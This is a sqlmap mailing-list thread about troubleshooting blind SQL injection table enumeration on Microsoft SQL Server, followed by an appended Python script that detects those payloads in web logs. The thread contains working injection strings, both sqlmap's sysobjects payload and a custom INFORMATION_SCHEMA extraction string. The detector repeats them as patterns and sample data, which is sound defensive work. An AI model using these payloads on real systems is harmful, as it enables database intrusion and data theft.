Hi Cats.
Please wait for a day or two and you'll hopefully be able to use sqlmap in
that case too.
Kind regards,
Miroslav Stampar
On Mon, Jan 2, 2012 at 8:01 PM, cats <d...@alcor.se> wrote:
> I can dump users and databases, but not the tables in any database.
>
> Here's some output from sqlmap:
>
> Revision: 4643
>
> [18:58:04] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows Vista
> web application technology: ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Microsoft SQL Server 2008
>
> [18:58:04] [INFO] fetching tables for database: productcatalog
> [18:58:04] [INFO] fetching number of tables for database
> 'productcatalog'
> [18:58:04] [PAYLOAD] 99047' AND ASCII(SUBSTRING((SELECT
> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM
> eservice_productcatalog..sysobjects WHERE xtype IN
> (CHAR(117),CHAR(118))),1,1)) > 51 AND 'cfIC'='cfIC
> [18:58:05] [DEBUG] reflective value found and filtered out
>
> It just goes on like this and simply spits out a "retrieved" which is
> empty, and it will continue doing so until it has reached the length of
> the current table. Thus the result will be something like:
>
> dbo.""
> dbo.""
> dbo.""
>
> ...and so on
>
> I wrote a Perl script that could successfully extract the tables from my
> database, using the following injection string.
>
> Clean version of the injection:
>
> AND (
> CASE
> WHEN SUBSTRING((
> SELECT TOP 1 TABLE_NAME FROM (
> SELECT TOP ' . $i . ' TABLE_NAME FROM
> INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG=\'' . $dbname . '\'
> ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),' . $nc .
> ',1)=char(' . ord(substr($chars,$c,1)) . ') THEN 1 ELSE 2 END)=\'1
>
> So the important part is "SELECT TABLE_NAME FROM
> INFORMATION_SCHEMA.TABLES", as "SELECT name FROM dbname..sysobjects
> WHERE xtype = 'U'" doesn't seem to work for me.
>
> Has anyone else had this issue?
> Am I doing something wrong, or is this a bug in sqlmap?
> Or maybe it's the configuration on my mssql server?
>
> Anyway, advice is welcome :-)
>
> Cheers!
>
>
>
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
--
Miroslav Stampar
http://about.me/stamparm
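
For anyone reading this thread from the monitoring side, the following is an added example (not part of either message and not sqlmap code) that flags the two payload shapes quoted above in web access logs and separates a one-off probe from repeated character-by-character extraction. The log format, client IPs, signal names and the `min_repeats` threshold are assumptions, and the sample lines are constructed from the payloads in the thread.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import quote, unquote_plus

SIGNALS = {
    "char_extract": re.compile(r"SUBSTRING\s*\(\s*\(\s*SELECT", re.I),  # SUBSTRING((SELECT ...
    "catalog": re.compile(r"\bsysobjects\b|INFORMATION_SCHEMA\.TABLES", re.I),
    "char_encoding": re.compile(r"\bCHAR\s*\(\s*\d+\s*\)", re.I),       # CHAR(117) style literals
    "quote_balance": re.compile(r"'(\w+)'\s*=\s*'\1$"),                 # trailing 'cfIC'='cfIC
}

def signals(path):
    """Names of the signals present in one URL-decoded request path."""
    text = unquote_plus(path)
    return {name for name, rx in SIGNALS.items() if rx.search(text)}

def analyze(lines, min_repeats=3):
    """Per client: signals seen, hit count, and whether one payload template repeats."""
    per_client = defaultdict(lambda: {"signals": set(), "templates": Counter()})
    for line in lines:
        ip, _method, path = line.split(" ", 2)
        found = signals(path)
        # A subquery read one character at a time from a system catalog.
        if "char_extract" in found and "catalog" in found:
            entry = per_client[ip]
            entry["signals"] |= found
            # Blind extraction varies only numeric constants; mask them to get the template.
            entry["templates"][re.sub(r"\d+", "N", unquote_plus(path))] += 1
    return {ip: {"signals": e["signals"], "hits": sum(e["templates"].values()),
                 "automated": max(e["templates"].values()) >= min_repeats}
            for ip, e in per_client.items()}

def _req(ip, payload):
    return f"{ip} GET /product.aspx?id=" + quote(payload)

# Constructed sample log; payload shapes copied from the thread, everything else assumed.
SQLMAP_SHAPE = ("99047' AND ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) "
                "AS NVARCHAR(4000)),CHAR(32)) FROM eservice_productcatalog..sysobjects "
                "WHERE xtype IN (CHAR(117),CHAR(118))),1,1)) > {n} AND 'cfIC'='cfIC")
SCRIPT_SHAPE = ("99047' AND (CASE WHEN SUBSTRING((SELECT TOP 1 TABLE_NAME FROM (SELECT TOP 3 "
                "TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_CATALOG='productcatalog' "
                "ORDER BY TABLE_NAME ASC) sq ORDER BY TABLE_NAME DESC),1,1)=char(97) "
                "THEN 1 ELSE 2 END)='1")
SAMPLE_LOG = ["10.0.0.5 GET /product.aspx?id=99047"]
SAMPLE_LOG += [_req("10.0.0.7", SQLMAP_SHAPE.format(n=n)) for n in (51, 48, 49)]
SAMPLE_LOG.append(_req("10.0.0.9", SCRIPT_SHAPE))

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info["hits"], sorted(info["signals"]), "automated" if info["automated"] else "probe")
```
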